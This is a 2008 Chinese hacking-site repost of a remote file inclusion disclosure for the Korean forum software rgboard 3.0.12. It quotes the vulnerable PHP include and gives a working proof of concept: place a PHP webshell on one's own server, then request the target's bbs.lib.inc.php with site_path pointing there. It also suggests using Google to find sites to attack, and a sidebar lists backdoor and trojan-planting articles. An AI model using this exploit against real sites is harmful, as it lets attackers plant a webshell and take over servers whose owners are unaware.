黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 网管频道 >> 入侵检测 >> 正文
·rgboard 3.0.12 远程文件05-08·迅雷本地溢出POC05-08
·perl后门,正向和反向05-08·嘉英网提供50-1000M免费05-08
·掌控Vista从控制面板说起05-07·XP系统桌面主题搬家小技05-07
·把Windows 2008 RC1配置05-07·用WinPE备份Windows Vis05-07
·无限网络免费硬盘-易上传05-07·火网数据中心提供30M免费05-07
·新思路用Gene恢复系统管05-06·虫网磁盘100M免费网络硬05-06
·天寻网络提供30-100M免费05-06·Windows Server 2008使用05-05
·51.com提供1000M网络免费05-05·站长扶持计划---站长中国05-05
·WordPress Cookie完整性05-04·WordPress wpSS插件ss_i05-04
·Oblog漏洞五一重现05-04·跨站脚本-攻击和防御指05-04
·两个shellcode05-04·代理工具:CTProxy 1.0 05-04
·强悍挂马工具:IIS_AD I05-04·Windows XP with SP3 VO05-04
·易美网络提供1000M网络免05-04·终点免费空间提供100M免05-04
·Vista中新增命令完整版 05-01·Windows系统中的“普通人05-01
[推荐]rgboard 3.0.12 远程文件包含漏洞
        ★★★★★

rgboard 3.0.12 远程文件包含漏洞

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-5-8 11:21:37

Infos: rgboard 3.0.12 远程文件包含漏洞
Author: Flyh4t[w.s.t]

rgboard 3.0.12 是韩国的一个论坛程序,可以用google搜索rgboard查看使用的网站
vul code:
\include\bbs.lib.inc.php:
if (!defined(’BBS_LIB_INC_INCLUDED’)) {
define(’BBS_LIB_INC_INCLUDED’, 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path=’./’;
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接放过来包含了
poc:
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php
然后访问
httP://www.目标网站.com/include/bbs.lib.inc.php?site_path=http://你的网站地址/

文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886